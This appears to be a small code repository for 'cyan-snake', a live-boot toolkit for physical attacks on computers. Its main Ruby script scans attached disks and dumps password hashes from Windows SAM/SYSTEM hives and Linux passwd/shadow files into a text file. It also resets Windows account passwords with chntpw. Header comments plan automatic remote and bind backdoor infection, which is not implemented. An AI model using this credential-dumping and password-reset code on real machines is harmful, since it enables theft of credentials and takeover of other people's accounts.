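├── README.md
├── set_liveos.rb
├── LICENSE
├── .gitignore
└── cyan-snake.rb

/README.md:
--------------------------------------------------------------------------------
# cyan-snake
Live OS for Physical hacking

--------------------------------------------------------------------------------
/set_liveos.rb:
--------------------------------------------------------------------------------
# Interactive setup for the cyan-snake live OS.
#
# Step 1 relinks the systemd default target (terminal or graphical boot).
# Step 2 optionally registers cyan-snake.rb in ~/.bashrc so it starts with
# every interactive shell of the live user.
#
# Relinking /etc/systemd/system/default.target requires root.

require 'shellwords'

DEFAULT_TARGET_LINK = '/etc/systemd/system/default.target'

# Menu answer => [systemd target to link, message printed on success].
BOOT_TARGETS = {
  '1' => ['/lib/systemd/system/multi-user.target', ' - success terminal mode'],
  '2' => ['/lib/systemd/system/graphical.target', ' - success graphic mode']
}.freeze

# Prompts and returns one line from the terminal without its newline.
# End of input yields "" (no selection) instead of NoMethodError on nil.
def ask
  print "#> "
  $stdin.gets.to_s.chomp
end

puts " -- boot mode"
puts " select number for boot"
puts " [1] terminal mode"
puts " [2] graphic mode"
target, done_message = BOOT_TARGETS[ask]
if target
  # Argument-vector form: no shell parses the command, and the success line
  # is printed only when ln really succeeded.
  if system('ln', '-sf', target, DEFAULT_TARGET_LINK)
    puts done_message
  else
    warn " - failed to link #{DEFAULT_TARGET_LINK}"
  end
end

puts " -- autorun mode"
puts " select number for autorun(.bashrc)"
puts " [1] yes"
puts " [2] no"
case ask
when '1'
  # Absolute, shell-escaped path: the .bashrc entry keeps working from any
  # working directory and a directory name containing quotes or spaces can
  # neither break nor extend the line.
  launcher = File.join(File.dirname(File.expand_path(__FILE__)), 'cyan-snake.rb')
  entry = "ruby #{Shellwords.escape(launcher)}"
  bashrc = File.expand_path('~/.bashrc')
  # Appending directly (instead of `echo ... >> ~/.bashrc` through a shell)
  # also lets a second run detect the existing entry and skip the duplicate.
  registered = File.exist?(bashrc) && File.foreach(bashrc).any? { |l| l.chomp == entry }
  File.open(bashrc, 'a') { |f| f.puts(entry) } unless registered
  puts "success autorun"
when '2'
  puts "no autorun"
end

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2017 하훌(HAHWUL)

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
*.gem
*.rbc
/.config
/coverage/
/InstalledFiles
/pkg/
/spec/reports/
/spec/examples.txt
/test/tmp/
/test/version_tmp/
/tmp/

# Used by dotenv library to load environment variables.
# .env

## Specific to RubyMotion:
.dat*
.repl_history
build/
*.bridgesupport
build-iPhoneOS/
build-iPhoneSimulator/

## Specific to RubyMotion (use of CocoaPods):
#
# We recommend against adding the Pods directory to your .gitignore. However
# you should judge for yourself, the pros and cons are mentioned at:
# https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control
#
# vendor/Pods/

## Documentation cache and generated files:
/.yardoc/
/_yardoc/
/doc/
/rdoc/

## Environment normalization:
/.bundle/
/vendor/bundle
/lib/bundler/man/

# for a library or gem, you might want to ignore these files since the code is
# intended to run in multiple environments; otherwise, check them in:
# Gemfile.lock
# .ruby-version
# .ruby-gemset

# unless supporting rvm < 1.11.0 or doing something fancy, ignore this:
.rvmrc

--------------------------------------------------------------------------------
/cyan-snake.rb:
--------------------------------------------------------------------------------

###
#
# Default Action
# - Get System Information
#   + Computer name
#   + Network config

# 1 > ON UI MODE
#  1-1 > Dump Hash(Win: SAM+SYSTEM / Linux: passwd+shadow)
#  1-2 > Change password(only windows)
#  1-3 >

# 2 > OFF UI MODE(Auto mode)
#  2-1 > Auto Gathering System Information
#  2-2 > Auto Infection(remote backdoor)
#  2-3 > Auto Infection(bind backdoor)

# Reviewer summary of what this file actually implements: only menu path 1
# (1-1 and 1-2) is wired into the main loop; entry "[2] > auto" is displayed
# but no branch handles it, and none of the 2-x items above exist in code.
# Both implemented actions read credential stores from a disk that is not
# the running system's own, so the installed OS's file permissions are not
# in play; disk encryption and restricting boot from external media are the
# controls that apply to this scenario.

# Device lines collected by sinit (kept as printed by fdisk, newline included).
@devices = []
# Menu text shown by getcmd under the banner.
@message = ""

BANNER = [
  " __ __ __ __ ",
  " / \\ / \\ / \\ / \\ ",
  "____________________/ __\\/ __\\/ __\\/ __\\_____________________________ ",
  "____CYAN-SNAKE_____/ /__/ /__/ /__/ /_________CODE BY HAHWUL_________ ",
  " | / \\ / \\ / \\ / \\ \\____ ",
  " |/ \\_/ \\_/ \\_/ \\ @ \\ ",
  " \\_____/--< "
].freeze

# Clears the screen, draws the banner and the current @message, then reads
# one line from the operator.
#
# @return [String] the input without its trailing newline; "exit" at end of
#   input, so the main loop terminates instead of raising NoMethodError.
def getcmd
  system("clear")
  puts BANNER
  puts @message
  puts " ____________"
  print "[cyan-snake] #> "
  answer = $stdin.gets
  answer ? answer.chomp : "exit"
end

# Fills @devices with every "/dev/..." line printed by `fdisk -l -o Device`
# and echoes the mount command that would correspond to each one.
# Nothing is mounted: the mount call itself is commented out.
def sinit
  IO.popen(%w[fdisk -l -o Device], 'r') do |pipe|
    pipe.each_line do |line|
      next unless line.start_with?("/dev/")

      @devices.push(line)
      device = line.strip
      # Strip before slicing so the echoed mount point carries no newline.
      puts "mount #{device} /mnt/#{device[5, 8]}"
      #system("mount "+line.strip+" /mnt/"+line[5,8])
    end
  end
rescue Errno::ENOENT
  # fdisk is not installed or not on PATH; continue with an empty list.
  warn "fdisk not found; no devices listed"
end

# Sub-menu for path 1: dispatches to f11 (dump) or f12 (password change).
# Any other answer returns to the caller.
def f1
  @message = "(/1)\nPlease choice\n [1] > Dump Hash(Win: SAM+SYSTEM / Linux: passwd+shadow)\n [2] > Change password(only windows)\n"
  case getcmd.downcase
  when '1' then f11
  when '2' then f12
  end
end

# For each entry in @devices, runs samdump2 where a Windows registry config
# directory is found and unshadow where /usr/share and /etc are found; both
# commands write to /data/dump.txt. Waits for Enter after each run.
def f11
  @message = "(/1/1)\nPlease choice\n [1] > Dump Hash(Win: SAM+SYSTEM / Linux: passwd+shadow)\n [2] > Change password(only windows)\n"
  @devices.each do |mnt|
    mnt = mnt.strip
    hive_dir = mnt + "/Windows/System32/config/"
    puts hive_dir
    if File.directory?(File.expand_path(hive_dir))
      # Block form restores the previous working directory afterwards, so a
      # later relative path is not resolved inside this volume by accident.
      Dir.chdir(hive_dir) { system("samdump2 -o /data/dump.txt SYSTEM SAM") }
      $stdin.gets
    end

    etc_dir = mnt + "/etc/"
    # Check etc_dir itself as well: chdir would raise if only /usr/share exists.
    if File.exist?(File.expand_path(mnt + "/usr/share/")) && File.directory?(etc_dir)
      Dir.chdir(etc_dir) { system("unshadow passwd shadow > /data/dump.txt") }
      $stdin.gets
    end
  end
end

# For each entry in @devices that has a Windows registry config directory,
# lists the SAM accounts with chntpw, asks for a user name and starts
# chntpw's interactive editor for it. Waits for Enter at the end.
def f12
  @message = "(/1/2)\nChange password(windows)\n"

  @devices.each do |mnt|
    hive_dir = mnt.strip + "/Windows/System32/config/"
    puts hive_dir
    next unless File.directory?(File.expand_path(hive_dir))

    Dir.chdir(hive_dir) do
      system("chntpw -l SAM")
      puts "Please input user name"
      print "[cyan-snake] #> "
      user = $stdin.gets.to_s.chomp
      if user.empty? || user.start_with?("-")
        # An empty name or one that looks like an option is never passed on.
        puts "invalid user name"
      else
        # Argument-vector form: the typed name reaches chntpw as exactly one
        # argument and is never interpreted by a shell (the original
        # concatenated it into a command string).
        system("chntpw", "-u", user, "SAM")
      end
    end
  end

  $stdin.gets
end

sinit
loop do
  @message = "(/)\nPlease choice\n [1] > UI MODE\n [2] > auto"
  case getcmd.downcase
  when 'exit', 'quit' then exit
  when 'shutdown' then system("shutdown -h 0")
  when '1' then f1
  end
end

--------------------------------------------------------------------------------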